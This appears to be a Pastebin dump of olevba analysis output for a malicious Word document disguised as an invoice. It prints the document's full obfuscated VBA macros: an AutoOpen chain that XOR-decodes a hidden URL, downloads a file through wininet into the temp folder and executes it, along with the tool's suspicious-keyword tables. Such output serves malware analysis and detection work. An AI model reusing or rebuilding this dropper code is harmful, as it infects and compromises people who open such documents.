Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 123-reg-invoice.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 123-reg-invoice.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ALVERTA(ALVINA As Integer)
- ALYCE
- End Sub
- Sub autoopen()
- ALVERTA (703)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MOHAMMAD.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As Long) As Long
- Public Declare Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As Long
- #End If
- Public Function ALANNA(ALISHA As Long, ByVal ALISHIA As String) As Boolean
- Dim ALYCIA As Long
- Dim Allo5LFRoolE64DIA As String * ALESSANDRA, ALd2PH3OdN3SO As String
- Dim ALISSA As Integer, ALISON As Double
- #If VBA7 _
- And Win64 Then
- Dim ALYSE As LongPtr
- Dim ALYSHA As LongPtr
- #Else
- Dim ALYSHA As Long
- Dim ALYSE As Long
- #End If
- ALYSE = ANASTACIA
- If ALYSE = 0 Then
- Exit Function
- End If
- Dim ALYSA As Boolean
- If AMELIA(ALYSHA, ALYSE) Then
- End If
- If ALYSHA = 0 Then
- ALISON = 0
- Else
- AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
- ALd2PH3OdN3SO = Allo5LFRoolE64DIA
- Dim ALITA As Long
- ALITA = 22
- ALITA = 4 * ALITA - 22
- If ALITA > ALITA + 44 Then End
- Do While ALYCIA <> 0
- AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
- ALd2PH3OdN3SO = ALd2PH3OdN3SO + Mid(Allo5LFRoolE64DIA, 1, ALYCIA)
- Loop
- ALISON = ALECIA(ALd2PH3OdN3SO): _
- ALISSA = ADELINA("JOSEF")
- Open ALISHIA _
- For Binary _
- Lock Write As #ALISSA
- Put #ALISSA, , ALd2PH3OdN3SO
- ALITA = ALITA + 87
- If ALITA < 0 Then End
- Close #ALISSA
- End If
- Ae3eLAYw3N4A ALYSHA
- Ae3eLAYw3N4A ALYSE
- ALd2PH3OdN3SO = ""
- If ALISON Then
- ALANNA = True
- End If
- End Function
- Public Function ALENA(ByRef AMBERLY As Object) As Object
- Set ALENA = AMBERLY.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MILLARD.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MILLARD'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const AARON = "193B33233B78033F272E2634283C2B2721"
- Public Const ABBEY = "163A3E22363F2E7B79736167672D3A2D"
- Public Const ABBIE = "2227223F6D796D2938313B323B212C2F222C5A5D46222F20782C383B6D7B647060607E6627302A"
- Public Const ABIALITA = "1930242627222B21306C093E252D11313C3D525F7B292036353B"
- Public Const ADALINE = "KJSVOWVBOWBOWIHBHOI724"
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As LongPtr, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
- #End If
- Public Function AGUEDA(AMANDA As Double)
- Dim AFTON As Object
- Dim AIDA As Long
- For AIDA = 43 To 47
- AIDA = AIDA + 22
- Next AIDA
- Dim WESTON As Object
- For AIDA = 21 To 76
- AIDA = AIDA + 73
- Next AIDA
- Set WESTON = ANABEL
- AIDA = AIDA + 345
- Dim LEWIS As Boolean
- If AIDA > AIDA * 4 Then End
- LEWIS = AISHA(AFTON, WESTON)
- AMANDA = AMANDA + 33
- End Function
- Public Function ALECIA(ADELLA As String) As Long
- ALECIA = Len(ADELLA)
- End Function
- Public Function ALBERT(ByRef AKIKO As Object, ByRef ALPHONSE As String, ALLEGRA As Double) As Boolean
- Set ALLENA = CreateObject(ALMEDA _
- (ADALINE, AARON))
- Dim DUSTY As Integer
- DUSTY = ALLENA.Open(AKIKO & ALPHONSE)
- End Function
- Public Function ALMEDA(ALMETA As String, ALONA As String) As String
- Dim ALPHA As Integer
- Dim ALTAGRACIA As Integer
- Dim ALTHEA As Long
- ALTHEA = 308
- If ALTHEA > ALTHEA * 10 Then End
- Dim ALEJANDRA As Long
- Dim ALVERA As String
- For ALEJANDRA = 1 To (ALECIA(ALONA) / 2)
- ALPHA = ALEIDA(ALONA, ALEJANDRA)
- ALTAGRACIA = ADRIAN(ALMETA, ALEJANDRA)
- ALVERA = ALVERA + ALBERTHA(ALPHA, ALTAGRACIA)
- Next ALEJANDRA
- ALMEDA = ALVERA
- End Function
- Public Function ADRIAN(ByRef ALMETA As String, ByRef ALEJANDRA As Long) As Integer
- ADRIAN = Asc(ALEXA(48, ALMETA, ((ALEJANDRA Mod ALECIA(ALMETA)) + 1), 1))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MARIANO.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARIANO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As LongPtr) As Long
- #End If
- Public Function AILEEN(ANAMARIA As String)
- Dim AILENE As String
- AILENE = "ANAMARIA"
- AGUEDA 221 + 3.22
- AILENE = AILENE + "AIMEE"
- End Function
- Public Function ALEIDA(ByRef ALONA As String, ByRef ALEJANDRA As Long) As Double
- ALEIDA = ANIBAL("&H" & (ALEXA(78, ALONA, ALYSSA(ALEJANDRA), 2)))
- End Function
- Public Function ALEXA(ALEXANDRA As Long, ByRef ADELLA As String, ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
- ALEXA = Mid$(ADELLA, ALPHA, ALTAGRACIA)
- ALEXANDRA = ALEXANDRA + 23
- End Function
- Public Function ALYSSA(ByRef ALEJANDRA As Long) As Long
- ALYSSA = (2 * ALEJANDRA) - 1
- End Function
- Sub AGUSTINA(ANALISA As Double)
- AILEEN ("ANALISA")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MARY.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ANIBAL(FRANCES As String) As Double
- Dim DILLON As Double
- For DILLON = 26 To 29
- DILLON = DILLON * 6.127
- Next DILLON
- DILLON = Val(FRANCES)
- ANIBAL = DILLON
- End Function
- Public Function AISHA(ByRef AKIKO As Object, ByRef AKILAH As Object) As Boolean
- Dim AL2AIN2A As Integer
- Set AKIKO = ALENA(ANABEL)
- Dim ADOLFO
- Dim ALPHONSE As String
- ALPHONSE = AFTON(3001, ADALINE, ABBEY)
- For AL2AIN2A = 21 To 34
- AL2AIN2A = AL2AIN2A * 12
- Next AL2AIN2A
- ADOLFO = AKIKO & ALPHONSE
- If ALANNA(52, ADOLFO) Then
- End If
- AISHA = ALBERT(AKIKO, ALPHONSE, 966)
- End Function
- Public Function ALBERTHA(ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
- Dim ALISA As Long
- ALISA = ALPHA Xor ALTAGRACIA
- ALBERTHA = Chr$(ALISA)
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function ANASTACIA() As LongPtr
- #Else
- Public Function ANASTACIA() As Long
- #End If
- ANASTACIA = AN3DR1EE2 _
- (ANDERA, _
- ANDRE, vbNullString, vbNullString, 0)
- End Function
- Public Function ANABEL() As Object
- Dim AMPARO As String
- AMPARO = ALMEDA(ADALINE, ABIALITA)
- Set ANABEL = CreateObject(AMPARO)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MONROE.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MONROE'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As LongPtr
- #End If
- Public Const JASPER = "RUSSEL"
- Public Const ALESSANDRA = 4000
- Public Const ANDERA As String = "ALETHEA"
- Public Const ANDRE = 1
- Public Const ALETHIA = &H4000000
- #If VBA7 And Win64 Then
- Public Function AMELIA(ByRef AMIEE As LongPtr, AMINA As LongPtr) As Boolean
- #Else
- Public Function AMELIA(ByRef AMIEE As Long, AMINA As Long) As Boolean
- #End If
- Dim AM425Ewr24tRI52CA As Long
- Dim AMIRA As String
- Dim AMMIE As Long
- AMIRA = AFTON(301, ADALINE, ABBIE)
- For AM425Ewr24tRI52CA = 55 To 33
- AM425Ewr24tRI52CA = AM425Ewr24tRI52CA + 900
- Next AM425Ewr24tRI52CA
- AMIEE = AL3ES1HI5A(AMINA, AMIRA, vbNullString, 0, ALETHIA, 0)
- AMELIA = True
- End Function
- Public Function AFTON(AGATHA As Long, HILARIO As String, ENRIQUE As String) As String
- AGATHA = AGATHA * 3
- AFTON = ALMEDA(HILARIO, ENRIQUE)
- End Function
- Public Function ADELINA(ADELLA As String) As Integer
- ADELINA = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As LongPtr, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As LongPtr
- #End If
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As Long, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
- Public Declare Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As Long, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As Long
- #End If
- Public Sub ALYCE()
- Dim DEWITT As Double
- Dim AGRIPINA As Double
- For AGRIPINA = 21 To 25
- AGRIPINA = AGRIPINA + 22
- Next AGRIPINA
- AGUSTINA (6.33)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement